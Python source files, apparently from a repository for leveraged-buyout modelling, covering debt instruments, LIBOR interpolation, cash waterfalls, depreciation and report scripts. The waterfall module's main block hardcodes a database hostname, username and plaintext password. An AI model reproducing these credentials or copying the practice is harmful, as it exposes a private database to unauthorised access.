df = pd.read_sql(query, cnx, params=(YIELD_CURVE_VERSION, self.index_name, YIELD_CURVE_DATE))
return df
def get_adj_libor(self):
#purpose: convert df from get_libor to curve based on month end dates
#call get_libor, interpolate/extropolate to month_end data points
#TODO: overload start and end date to allow extrapolation of rates
df = self.get_libor()
period = utils.calc_month_end(df['period'].min(), 'date')
curve = {}
while period < df.iloc[0]['period']:
#extropolate backwards - should never happen
increment = (df.iloc[1]['price'] - df.iloc[0]['price']) / (df.iloc[1]['period'] - df.iloc[0]['period']).days
interval = (df.iloc[0]['period'] - period).days
curve[period] = df.iloc[0]['price'] - interval * increment
period = utils.calc_next_month_end(period, 'date')
while period <= df['period'].max():
#interpolate
bottom_date = max(df.loc[(df['period']<=period)]['period'])
bottom_yield = df.loc[df['period']==bottom_date]['price'].values[0]
if period == bottom_date:
curve[period] = bottom_yield
elif df.loc[df['period']>period].shape[0] == 0:
#need to extropolate - does not happen unless overload start and end dates
increment = (df.iloc[-1]['price'] - df.iloc[-2]['price']) / ((df.iloc[-1]['period'] - df.iloc[-2]['period']).days)
interval = (period - df.iloc[-1]['period']).days
curve[period] = df.iloc[-1]['price'] + interval * increment
else:
top_date = min(df.loc[(df['period']>=period)]['period'])
bottom_yield = df.loc[df['period']==bottom_date]['price'].values[0]
top_yield = df.loc[df['period']==top_date]['price'].values[0]
increment = (top_yield - bottom_yield) / (top_date - bottom_date).days
interval = (period - bottom_date).days
curve[period] = bottom_yield + interval * increment
period = utils.calc_next_month_end(period, 'date')
#df_curve = pd.DataFrame(curve, columns= ['period', 'libor'])
return curve
def get_amount(self, item, period, cash=0.0, prepay=0.0):
#TODO cleanup is_interest_payment_date vs is_payment_date
if item == 'amortization':
if self.is_interest_payment_date(period) and period >= self.amort_date_start:
amount = -self.calc_amort(period)
else:
amount = 0.0
elif item == 'interest expense':
if self.is_interest_payment_date(period) and period >= self.interest_date_start:
amount = -self.calc_interest_expense(period, self.principal)
else:
amount = 0.0
elif item == 'sweep':
amount = 0.0
if self.flag_prepayable:
if self.is_interest_payment_date(period):
amount = -cash * self.sweep_percent
elif item == 'interest income':
if self.is_interest_payment_date(period):
amount = self.calc_interest_income(period)
else:
amount = 0.0
elif item == 'dsra release':
#dsra can only be used and therefore reset on a payment date
if self.is_interest_payment_date(period):
amount = self.dsra
else:
amount = 0.0
elif item == 'dsra reset':
#dsra can only be used and therefore reset on a payment date
if self.is_interest_payment_date(period):
if self.flag_prepayable:
amount = -self.calc_dsra(period, self.principal + prepay)
else:
amount = -self.calc_dsra(period, self.principal)
else:
amount = 0.0
elif item == 'dsra cleanup':
if self.is_interest_payment_date(period):
amount = -self.calc_dsra(period, self.principal) + self.dsra
else:
amount = 0.0
else:
print("Error in FloatingDebt get_amount - unknown item ", item)
sys.exit()
return amount
def calc_interest_rate(self, period):
try:
self.interest_rate = self.index[period] + self.margin
except:
print("Error in calc_interest_rate - invalid period ", period)
#if self.label == 'Test TLC':
#print(self.interest_rate)
return self.interest_rate
class MezzanineDebt(FixedDebt):
def __init__(self, **kwargs):
self.pik_interest_rate = kwargs['pik_interest_rate']
FixedDebt.__init__(self, **kwargs)
def get_amount(self, metric, period, cash=0, prepay=0.0):
#Mezz has cash option (lower interest if paying cash, must pass available cash)
if metric == 'interest expense':
#need to determine both cash interest expense and pik interest expense
#store pik interest to pik list
if flag_cash_interest == 'standard':
if self.calc_interest_rate(period) > 0.0:
cash_interest = self.calc_interest_expense(period)
else:
cash_interest = 0.0
if self.pik_interest_rate > 0.0:
pik_interest = self.calc_pik_interest(period)
elif flag_cash_interest == 'optional':
if cash == 0.0:
cash_interest = 0.0
pik_interest = self.calc_pik_interest(period)
else:
cash_interest = self.calc_interest_expense(period)
pik_interest = max(cash_interest - cash, 0.0) * self.pik_interest_rate / self.interest_rate
return cash_interest
elif metric == 'sweep':
sweep = cash * self.sweep_percent
return -sweep
else:
print("Error in FloatingDebt get_amount - unknown metric ", metric)
sys.exit()
return
def set_amount(self, item, period, cash_flow):
if item == 'interest income':
#not clear if anything needs to happen
pass
elif item == 'interest expense':
self.interest_expense.append((period, cash_flow))
elif item == 'amortization':
self.amortization.append((period, cash_flow))
self.principal += cash_flow
elif item == 'dsra_change':
self.dsra_change -= cash_flow
elif item == 'sweep':
self.prepayments.append((period, cash_flow))
self.principal += cash_flow
elif item == 'pik interest':
self.principal += cash_flow
else:
print("Error - unknow item sent to set_amount ", item)
return
def calc_pik_interest(self, period):
if period > self.maturity_date:
pik_exp = 0
elif period < self.payment_date_start:
pik_exp = 0
elif self.is_interest_payment_date(period):
prior_period = self.calc_prior_payment_period(period)
day_count_factor = utils.calc_day_count_factor(self.day_count, prior_period, period)
pik_exp = self.principal * self.pik_interest_rate * day_count_factor
else:
pik_exp = 0.0
return int_exp
class Equity:
def __init__(self, **kwargs):
self.type = kwargs['class']
self.label = kwargs['label']
self.periodicity_months = kwargs['periodicity_months']
self.first_payment_date = kwargs['first_payment_date'].date()
self.distributions = {}
return
def get_amount(self, item, period, cash=0, prepay=0.0):
if item == 'sweep':
if self.is_payment_date(period):
amount = -cash
else:
amount = 0.0
else:
print("Error - unknow item sent to Equity get_amount ", item)
return amount
def set_amount(self, item, period, cash=0):
if item == 'sweep':
self.distributions[period] = cash
else:
print("Error - unknow item sent to Equity set_amount ", item)
return
def is_payment_date(self,period):
if period < self.first_payment_date:
result = False
elif (period.year * 12 + period.month - self.first_payment_date.year * 12
- self.first_payment_date.month) % self.periodicity_months == 0:
result = True
else:
result = False
return result
class FixedAsset:
def __init__(self, entity, name, tax_life, convention, method, in_service_date, amount, description):
#def __init__(self, **kwargs):
self.entity = entity
self.name = name
self.tax_life = tax_life
self.convention = convention
self.method = method
self.in_service_date = in_service_date
self.amount = amount
self.description = description
def calc_depreciation(self, period):
if period < self.in_service_date:
return 0.0
elif period > self.in_service_date + relativedelta(years=self.tax_life):
return 0.0
else:
if period.year == self.in_service_date.year:
if self.convention == 'NA':
stub_factor = 0.0
elif self.convention == 'HY':
stub_factor = 0.5
elif self.convention == 'MM':
stub_factor = ((12 - self.in_service_date.month) +.5) / 12
else:
print("ERROR - Unknown convention in calc_depreciation")
sys.exit()
elif period.year == (self.in_service_date + relativedelta(years=self.tax_life)).year:
if self.convention == 'HY':
stub_factor = 0.5
elif self.convention == 'MM':
stub_factor = (period.month - 0.5) / 12
elif self.convention == 'NA':
stub_factor = 0.0
else:
print("ERROR - Unknown convention in calc_depreciation")
sys.exit()
else:
stub_factor = 1.0
if self.method == 'SL':
method_factor = 1 / self.tax_life
elif self.method == 'MACRS':
#add later
pass
elif self.method == 'NA':
method_factor = 0.0
else:
print("ERROR - Unknown method in calc_depreciation", method)
sys.exit()
return stub_factor * method_factor * self.amount
class TaxRegister:
def __init__(self, name):
self.entity = name
self.assets = []
def add_asset(self, asset):
self.assets.append(asset)
return
def calc_depreciation(self, period):
#returns annual tax depreciation for the period
depreciation = 0.0
for asset in self.assets:
depreciation += asset.calc_depreciation(period)
return depreciation
def print_assets(self):
for asset in self.assets:
print(asset.entity, asset.name, asset.tax_life, asset.convention, asset.method, asset.in_service_date, asset.amount, asset.description)
return
def get_portfolio_from_xlsx():
#template is hard coded here
path_data = str(Path(path).parent) + '/data/lbo/'
wb = opx.load_workbook(path_data + 'assumptions_template.xlsx')
ws = wb['portfolio']
portfolio_kwargs = {}
row = 5
while ws['a'+str(row)].value is not None:
key = ws['a' + str(row)].value
value = ws['b' + str(row)].value
portfolio_kwargs[key] = value
row += 1
wb.close()
return portfolio_kwargs
def get_cap_struct_from_xlsx():
#template is hard coded here
path_data = str(Path(path).parent) + '/data/lbo/'
wb = opx.load_workbook(path_data + 'assumptions_template.xlsx')
ws = wb['capital structure']
#scenario/version fixed location
cap_struct_scenario = ws['b3'].value
cap_struct_version = ws['b4'].value
cap_struct = {}
#name always starts at row 6, variable numbers of kwargs
instrument_key = ws['b6'].value
instrument = {}
row = 7
while ws['a'+str(row)].value is not None:
key = ws['a' + str(row)].value
if key == 'name':
#close out prior dictionary item
cap_struct[instrument_key] = instrument
instrument_key = ws['b' + str(row)].value
instrument = {}
else:
instrument[key] = ws['b' + str(row)].value
row += 1
#final entry in dictionary
cap_struct[instrument_key] = instrument
wb.close()
return cap_struct
def get_waterfall_from_xlsx():
#template is hard coded here
path_data = str(Path(path).parent) + '/data/lbo/'
wb = opx.load_workbook(path_data + 'assumptions_template.xlsx')
ws = wb['waterfall']
flow = namedtuple('flow', ('level, sublevel, instrument, item, method, split, flag_cash, report_subtotal'))
waterfall = []
row = 2
while ws['a'+str(row)].value is not None:
#scenario = ws['a' + str(row)].value
#version = ws['b' + str(row)].value
level = ws['c' + str(row)].value
sublevel = ws['d' + str(row)].value
instrument = ws['e' + str(row)].value
item = ws['f' + str(row)].value
method = ws['g' + str(row)].value
split = ws['h' + str(row)].value
flag_cash = ws['i' + str(row)].value
report_subtotal = ws['j' + str(row)].value
waterfall.append(flow(level, sublevel, instrument, item, method, split, flag_cash, report_subtotal))
row += 1
wb.close()
return waterfall
def get_tax_register_from_xlsx():
#template is hard coded here
#returns a list of tax assets
path_data = str(Path(path).parent) + '/data/lbo/'
wb = opx.load_workbook(path_data + 'assumptions_template.xlsx')
ws = wb['taxes']
fixed_asset = namedtuple('fixed_asset', ('entity, name, tax_life, convention, method, in_service_date, amount, description'))
register = []
row = 2
while ws['a'+str(row)].value is not None:
entity = ws['a' + str(row)].value
name = ws['b' + str(row)].value
tax_life = ws['c' + str(row)].value
convention = ws['d' + str(row)].value
method = ws['e' + str(row)].value
in_service_date = ws['f' + str(row)].value.date()
amount = ws['g' + str(row)].value / UNITS
description = ws['h' + str(row)].value
#register.append(fixed_asset(entity, name, tax_life, convention, method, in_service_date, amount, description))
register.append([entity, name, tax_life, convention, method, in_service_date, amount, description])
row += 1
wb.close()
return register
def npv(irr, cfs, yrs):
return np.sum(cfs / (1. + irr)**yrs)
def irr(cfs, yrs, x0, **kwargs):
return np.asscalar(fsolve(npv, x0=x0, args=(cfs, yrs), **kwargs))
def required_return_payment(payment, payment_years, investment, irr, cfs, yrs):
return npv(irr, cfs, yrs) - investment + npv(irr, payment, payment_years)
def convert_to_years(dividends, investment_date):
years = []
for dividend in dividends:
years.append((dividend[1]-investment_date)/365)
return years
def load_instruments(scenario):
#returns a dictionary of debt/equity instruments (objects)
instruments = {}
for ins in scenario:
kwargs = scenario[ins]
#print(kwargs['flag_include'])
#sys.exit()
if kwargs['flag_include']:
instruments[ins] = globals()[kwargs['class']](**kwargs)
return instruments
def pari_passu(period, level, sublevel, cash, waterfall, instruments, output):
#identify sublist from portfolio.waterfall of items that are pari passu
pari_items = []
for flow in waterfall:
if flow.level == level and flow.sublevel == sublevel:
pari_items.append(flow)
#cycle thru sublist with get_amount to determine total request
cash_requested = 0.0
for flow in pari_items:
cash_requested += instruments[flow.instrument].get_amount(flow.item, period, cash)
#calc pro-rata amount
if cash_requested == 0.0:
pro_ration = 1.0
else:
pro_ration = max(cash / cash_requested, 1.0)
#cycle thru sublist with set_amount
for flow in pari_items:
cash_flow = instruments[flow.instrument].get_amount(flow.item, period, cash)
if flag_debug:
print("{:,.2f}".format(cash), flow.instrument, flow.item, "{:,.2f}".format(cash_flow), 'pari passu')
portfolio.instruments[flow.instrument].set_amount(flow.item, period, cash_flow * pro_ration)
cash += cash_flow * pro_ration
output.append([period, flow.instrument, flow.item, cash, cash_flow * pro_ration, flow.level, flow.sublevel])
#return remaining cash
return cash, output
def calc_next_flow(level, sublevel, waterfall):
next_level = 0
next_sublevel = 0
flag = False
for flow in waterfall:
if flow.level == level and flow.sublevel == sublevel:
flag = True
else:
if flag == True:
next_level = flow.level
next_sublevel = flow.sublevel
break
return (next_level, next_sublevel)
def run_waterfall(prepay_solver, portfolio):
#This is run to get the initial estimate of prepayments to feed the solver
period = utils.calc_month_end(portfolio.close_date, 'date')
month = 0
periodicity_months = 1
output = []
excess_cash = []
while period <= utils.calc_month_end(portfolio.terminal_date, 'date'):
cash = 0.0
if flag_debug:
print(period)
#first flow is always level 1, sublevel 1
next_flow = (1,1)
for flow_counter in range(len(portfolio.waterfall)):
#note: cash outflows are negative, inflows positive
flow = portfolio.waterfall[flow_counter]
if (flow.level * 100 + flow.sublevel) == (next_flow[0] * 100 + next_flow[1]):
if flow.method == 'normal':
#special case if calling portfolio-level function (necessary for ptd)
if flow.instrument == 'Portfolio':
cash_requested = portfolio.get_amount(flow.item, period, cash, prepay_solver)
else:
cash_requested = portfolio.instruments[flow.instrument].get_amount(flow.item, period, cash, prepay_solver[month])
if cash_requested >= 0:
cash_flow = cash_requested
else:
#cleanup items need to allow for negative cash flow. Will be zero when solution found
if flow.item in ['dsra cleanup', 'ptd cleanup']:
cash_flow = cash_requested
else:
cash_flow = max(cash_requested, -cash)
if flow.instrument == 'Portfolio':
portfolio.set_amount(flow.item, period, cash_flow)
else:
portfolio.instruments[flow.instrument].set_amount(flow.item, period, cash_flow)
output.append([period, flow.instrument, flow.item, cash, cash_flow, flow.level, flow.sublevel])
if flag_debug:
print("{:,.2f}".format(cash), flow.instrument, flow.item, "{:,.2f}".format(cash_flow), "{:,.2f}".format(portfolio.instruments['TLB'].principal))
if flow.flag_cash:
cash += cash_flow
elif flow.method == 'pari passu':
cash, output = pari_passu(period, flow.level, flow.sublevel, cash, portfolio.waterfall, portfolio.instruments, output)
else:
print('Error in main loop - unknown waterfall item')
next_flow = calc_next_flow(flow.level, flow.sublevel, portfolio.waterfall)
period = utils.calc_next_month_end(period, 'date')
month += 1
return output
def solve_waterfall(prepay_solver, portfolio):
#This is run to get the initial estimate of prepayments to feed the solver
period = utils.calc_month_end(portfolio.close_date, 'date')
month = 0
periodicity_months = 1
output = []
excess_cash = []
while period <= utils.calc_month_end(portfolio.terminal_date, 'date'):
cash = 0.0
if flag_debug:
print(period)
#first flow is always level 1, sublevel 1
next_flow = (1,1)
for flow_counter in range(len(portfolio.waterfall)):
#note: cash outflows are negative, inflows positive
flow = portfolio.waterfall[flow_counter]
if (flow.level * 100 + flow.sublevel) == (next_flow[0] * 100 + next_flow[1]):
if flow.method == 'normal':
#special case if calling portfolio-level function (necessary for ptd)
if flow.instrument == 'Portfolio':
cash_requested = portfolio.get_amount(flow.item, period, cash, prepay_solver)
else:
cash_requested = portfolio.instruments[flow.instrument].get_amount(flow.item, period, cash, prepay_solver[month])
if cash_requested >= 0:
cash_flow = cash_requested
else:
#cleanup items need to allow for negative cash flow. Will be zero when solution found
if flow.item in ['dsra cleanup', 'ptd cleanup']:
cash_flow = cash_requested
else:
cash_flow = max(cash_requested, -cash)
if flow.instrument == 'Portfolio':
portfolio.set_amount(flow.item, period, cash_flow)
else:
portfolio.instruments[flow.instrument].set_amount(flow.item, period, cash_flow)
output.append([period, flow.instrument, flow.item, cash, cash_flow, flow.level, flow.sublevel])
if flag_debug:
print("{:,.2f}".format(cash), flow.instrument, flow.item, "{:,.2f}".format(cash_flow), "{:,.2f}".format(portfolio.instruments['TLB'].principal))
if flow.flag_cash:
cash += cash_flow
elif flow.method == 'pari passu':
cash, output = pari_passu(period, flow.level, flow.sublevel, cash, portfolio.waterfall, portfolio.instruments, output)
else:
print('Error in main loop - unknown waterfall item')
next_flow = calc_next_flow(flow.level, flow.sublevel, portfolio.waterfall)
excess_cash.append(cash)
period = utils.calc_next_month_end(period, 'date')
month += 1
return excess_cash
def create_portfolio():
portfolio_kwargs = get_portfolio_from_xlsx()
portfolio = Portfolio(**portfolio_kwargs)
#cap_struct is a dictionary of dictionaries
# first key is name of instrument
# second key is kwarg for object
portfolio.cap_struct = get_cap_struct_from_xlsx()
#instruments is a dictionary of objects
# key is name of instrument
portfolio.instruments = load_instruments(portfolio.cap_struct)
#waterfall is a list of namedtuples
# each item in the list is a step in the waterfall
portfolio.waterfall = get_waterfall_from_xlsx()
return portfolio
def waterfall_shell(prepay_solver):
global COUNTER
print(COUNTER)
COUNTER += 1
#prepay_solver is a list of prepayments
portfolio = create_portfolio()
#if portfolio.flag_ptd:
# portfolio.calc_ptd()
excess = solve_waterfall(prepay_solver, portfolio)
time_elapesed = datetime.now() - START_TIME
#print(time_elapesed)
return excess
if __name__ == '__main__':
#TODO: figure out global database access
HOST = 'kindledb.cfdmlfy5ocmf.us-west-2.rds.amazonaws.com'
USER = 'Andrew'
PASSWORD = 'Kindle01'
DATABASE = 'kean'
cnx = utils.generate_connection_instance(HOST, USER, PASSWORD, DATABASE)
global START_TIME
START_TIME = datetime.now()
global UNITS
UNITS = 1000000
flag_debug = True
#need global variable for scenario start and end dates
#try:
# PORTFOLIO_START_DATE = portfolio.close_date
#except:
# print("Error - no portfolio start date selected")
#need global variable for yield curve date. attribute of Portfolio
try:
YIELD_CURVE_DATE = date(2019, 6, 26) #portfolio.yield_curve_date
YIELD_CURVE_VERSION = 'v3' #portfolio.yield_curve_version
except:
#not using KEAN for libor curve
pass
#create prepay_solver
prepay_solver = []
period = date(2019, 6, 30)
terminal_date = date(2020, 12, 31)
#establish initial estimate of prepayments
# can change value in 'if' portion of statement
while period <= terminal_date:
if period == date(2019, 6, 30):
prepay_solver.append(0.0)
else:
prepay_solver.append(0.0)
period = utils.calc_next_month_end(period, 'date')
#below solver was attempt to speed up fsolve by using solution as first estimate, did not work
#prepay_solver = [0,0,0,-30.2118,0,0,-19.4408,0,0,-69.8305,0,0,0,0,0,-24.4698,0,0,-10.0611]
portfolio = create_portfolio()
output = run_waterfall(prepay_solver, portfolio)
#print('amortization ', portfolio.instruments['TLC'].amortization)
#print('prepayments ', portfolio.instruments['TLC'].prepayments)
#print('principal', portfolio.instruments['TLC'].principal, portfolio.instruments['TLC'].initial_balance)
#sys.exit()
df_output = pd.DataFrame(output, columns=['period', 'instrument', 'item', 'cash', 'cash_flow', 'level', 'sublevel'])
criteria = ((df_output['item']=='sweep') & (df_output['instrument']=='TLB'))
prepay_solver = df_output[criteria]['cash_flow'].tolist()
#THIS IS WHERE THE MAGIC HAPPENS
COUNTER = 1
portfolio = create_portfolio()
solver = fsolve(waterfall_shell, prepay_solver)
#save solver solution to csv file to use later in testing
#with open('solver.csv', 'w', newline='') as myfile:
# wr = csv.writer(myfile, quoting=csv.QUOTE_ALL)
# wr.writerow(solver)
portfolio = create_portfolio()
output = run_waterfall(solver, portfolio)
df_output = pd.DataFrame(output, columns=['period', 'instrument', 'item', 'cash', 'cash_flow', 'level', 'sublevel'])
#df_output.to_csv('lbo_output.csv')
#create_lbo_support_report(portfolio)
create_waterfall_report(df_output, portfolio.waterfall)
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,754 | changliukean/KEAN3 | refs/heads/master | /display/ReportWriter.py | import openpyxl as opx
from openpyxl.styles import PatternFill, Border, Side, Alignment, Protection, Font
class Format:
def __init__(self,
start_row,
start_column,
end_row,
end_column,
font=Font(name='Calibri',size=11,bold=False,italic=False,vertAlign=None,underline='none',strike=False,color='FF000000'),
fill=PatternFill(fill_type=None,start_color='FFFFFFFF',end_color='FF000000'),
border=Border(left=Side(border_style=None,color='FF000000'),right=Side(border_style=None,color='FF000000'),
top=Side(border_style=None,color='FF000000'),bottom=Side(border_style=None,color='FF000000')),
alignment=Alignment(horizontal='general',vertical='bottom',text_rotation=0,wrap_text=False,shrink_to_fit=False,indent=0),
number_format='General'):
self.startRow = start_row
self.startColumn = start_column
self.endRow = end_row
self.endColumn = end_column
self.font = font,
self.fill = fill,
self.border = border,
self.alignment = alignment,
self.number_format = number_format
def pack_format(self):
pass
def unpack_format(input_obj):
pass
class ReportWriter:
def __init__(self, output_filepath, data_matrix=[], formats=[]):
self.DataMatrix = data_matrix
self.Formats = formats
self.outputFilepath = output_filepath
def write(self):
pass
# #
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,755 | changliukean/KEAN3 | refs/heads/master | /lbo_diff.py | from utility.dispatchUtils import load_pp_tech_info, convert_uc_dataframe, load_solar_dispatch, load_nuclear_dispatch
from datetime import datetime, date
from database.dbPCUC import put_characteristics
from database.dbDispatch import put_dispatch, get_dispatch
from database.dbLBO import put_powerplant, put_technology, get_powerplants, get_technology, put_financials_lbo, get_financials_lbo, put_lbo_assumptions, get_lbo_assumptions,get_portfolio_with_powerplant,get_powerplants_by_portfolio
from database.dbScenarioMaster import insert_scenario_master, delete_scenario_master
from utility.lboUtils import read_excel_lbo_inputs
from lbo import lbo
from model.Entity import Powerplant
from model.Portfolio import Portfolio
from utility.dateUtils import get_month_list
import numpy as np
import sys
import pandas as pd
if __name__ == '__main__':
# portfolio = 'Norway'
# portfolio_obj = Portfolio('Norway')
# powerplant_df = get_powerplants_by_portfolio(portfolio)
""" diff report """
portfolio = 'Norway'
first_lbo_scenario = 'Norway'
first_lbo_version = 'v7'
second_lbo_scenario = 'Norway'
second_lbo_version = 'v6'
dest_file_path = r"C:\Users\cliu\Kindle Energy Dropbox\Chang Liu\LBO\reports\\" + portfolio
first_lbo_financials_df = get_financials_lbo(portfolio, first_lbo_scenario, first_lbo_version)
second_lbo_financials_df = get_financials_lbo(portfolio, second_lbo_scenario, second_lbo_version)
lbo.write_lbo_financials_diff_report(dest_file_path, portfolio, first_lbo_financials_df, second_lbo_financials_df)
sys.exit()
portfolio = 'Vector'
first_lbo_scenario = 'Vector'
first_lbo_version = 'v12.2'
second_lbo_scenario = 'Vector'
second_lbo_version = 'v12'
dest_file_path = r"C:\Users\cliu\Kindle Energy Dropbox\Chang Liu\LBO\reports\\" + portfolio
first_lbo_financials_df = get_financials_lbo(portfolio, first_lbo_scenario, first_lbo_version)
second_lbo_financials_df = get_financials_lbo(portfolio, second_lbo_scenario, second_lbo_version)
lbo.write_lbo_financials_diff_report(dest_file_path, portfolio, first_lbo_financials_df, second_lbo_financials_df)
# """ graphs output """
# portfolio = 'Vector'
# lbo_financials_scenario = 'Vector'
# lbo_financials_version = 'v7.1'
# lbo_graph_output_template = 'Dispatch Output_Graphs template.xlsx'
# lbo_financials_df = get_financials_lbo(portfolio, lbo_financials_scenario, lbo_financials_version)
# lbo.write_lbo_graph_report('Dispatch Output_Graphs template.xlsx', lbo_financials_df)
# lbo_financials_df = get_financials_lbo(portfolio, lbo_financials_scenario, lbo_financials_version)
# dest_file_path = r"C:\Users\cliu\Kindle Energy Dropbox\Chang Liu\LBO\reports\\" + portfolio
#
# lbo.write_lbo_financials_report_monthly(dest_file_path, lbo_financials_df, portfolio)
# #
# #
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,756 | changliukean/KEAN3 | refs/heads/master | /model/Entity.py | from database import dbPrices, dbLBO
import numpy as np
from datetime import datetime, date, timedelta
import pandas as pd
import sys
class Entity:
def __init__(self, name, type):
self.name = name
self.type = type
def get_match_signal(row):
if np.isnan(row['total_lmp_x']) or np.isnan(row['total_lmp_y']):
return 'Not matched'
return 'Matched'
class Powerplant(Entity):
def __init__(self, name, fuel_type, market, node, power_hub,
technology=None,
power_zone='',
power_hub_on_peak='',
power_hub_off_peak='',
fuel_zone='',
fuel_hub='',
summer_fuel_basis=0.0,
winter_fuel_basis=0.0,
summer_duct_capacity=0.0,
summer_base_capacity=0.0,
winter_duct_capacity=0.0,
winter_base_capacity=0.0,
first_plan_outage_start=date(1900,1,1),
first_plan_outage_end=date(1900,1,1),
second_plan_outage_start=date(1900,1,1),
second_plan_outage_end=date(1900,1,1),
carbon_cost=0.0,
source_notes='',
retirement_date=date(1900,1,1),
ownership=0.0):
Entity.__init__(self, name, 'plant')
self.technology = technology
self.fuelType = fuel_type
self.market = market
self.node = node # power node name
self.powerHub = power_hub # power hub name
self.powerZone = power_zone
self.powerHubOnPeak = power_hub_on_peak
self.powerHubOffPeak = power_hub_off_peak
self.fuelZone = fuel_zone
self.fuelHub = fuel_hub
self.summerFuelBasis = summer_fuel_basis
self.winterFuelBasis = winter_fuel_basis
self.summerDuctCapacity = summer_duct_capacity
self.summerBaseCapacity = summer_base_capacity
self.winterDuctCapacity = winter_duct_capacity
self.winterBaseCapacity = winter_base_capacity
self.firstPlanOutageStart = first_plan_outage_start
self.firstPlanOutageEnd = first_plan_outage_end
self.secondPlanOutageStart = second_plan_outage_start
self.secondPlanOutageEnd = second_plan_outage_end
self.carbonCost = carbon_cost
self.sourceNotes = source_notes
self.retirementDate = retirement_date
self.ownership = ownership
def build_basis(self, start_date, end_date, dart, outlier_absolute_limit=0.5, replace_inf=np.nan):
nodal_lmp_df = dbPrices.get_historical_lmp(self.node, start_date, end_date, dart)
hub_lmp_df = dbPrices.get_historical_lmp(self.powerHub, start_date, end_date, dart)
print ("------------------------------------------------")
print (self.market, self.node, len(nodal_lmp_df))
print (self.market, self.powerHub, len(hub_lmp_df))
if len(nodal_lmp_df) == 0 or len(hub_lmp_df) == 0 or nodal_lmp_df is None or hub_lmp_df is None:
return pd.DataFrame(), pd.DataFrame()
